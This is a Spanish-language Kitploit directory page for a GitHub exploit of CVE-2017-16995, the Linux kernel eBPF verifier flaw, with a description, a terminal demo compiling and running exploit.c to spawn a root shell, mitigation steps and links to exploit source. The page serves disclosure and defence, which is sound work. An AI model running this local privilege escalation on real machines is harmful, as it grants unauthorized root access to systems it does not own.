Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-16995 — Linux Kernel Version 4.14 - 4.4 (Ubuntu y Debian) | Kitploit
Herramientas/GitHubGitHub/c0dak/cve-2017-16995
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Binarios
GitHubc0dak/cve-2017-16995

CVE-2017-16995

Linux Kernel Version 4.14 - 4.4 (Ubuntu y Debian)

Ver Repositorio
15hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Linux Kernel Version 4.14 - 4.4 (Ubuntu && Debian)

Descripción

Esta vulnerabilidad existe en la llamada al sistema eBPF bpf(2) del kernel de Linux. Cuando un usuario proporciona un programa BPF malicioso, provoca errores de cálculo en el módulo validador de eBPF, lo que resulta en problemas de lectura/escritura arbitraria de memoria. Los usuarios no privilegiados pueden usar esta vulnerabilidad para escalar privilegios. La vulnerabilidad fue descubierta por Google project zero.

Número de vulnerabilidad

CVE-2017-16995

Nivel de amenaza

Alto

Demostración

root@kitploit:~
bearcat@ubuntu:/opt$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial
bearcat@ubuntu:/opt$ uname -a
Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bearcat@ubuntu:/opt$ id
uid=1000(bearcat) gid=1000(bearcat) groups=1000(bearcat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
bearcat@ubuntu:/opt$ ls
exploit.c
bearcat@ubuntu:/opt$ gcc exploit.c -o exploit
bearcat@ubuntu:/opt$ ./exploit
task_struct = ffff88003a0db800
uidptr = ffff8800374b76c4
spawning root shell
root@ubuntu:/opt# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(bearcat)
root@ubuntu:/opt#

Recomendaciones de reparación

  1. Actualmente no hay un plan claro de actualización de parches. Se recomienda a los usuarios, después de evaluar el riesgo, limitar el uso de la llamada al sistema bpf(2) por parte de usuarios comunes modificando los parámetros del kernel:

    Establezca el parámetro “kernel.unprivileged_bpf_disabled = 1” para evitar esta escalada de privilegios al restringir el acceso a la llamada bpf(2)

root@Ubuntu# echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

  1. Parche de código relacionado https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

Enlaces relacionados

http://cyseclabs.com/exploits/upstream44.c

https://security-tracker.debian.org/tracker/CVE-2017-16995

https://www.securityfocus.com/bid/102288

https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor?utmcampaign=General%20website&utmcontent=67375488&utmmedium=social&utmsource=twitter

https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://cert.360.cn/warning/detail?id=119f849891f2a1b5deef65f99923ab5a

https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://github.com/jas502n/Ubuntu-0day

Descargar herramienta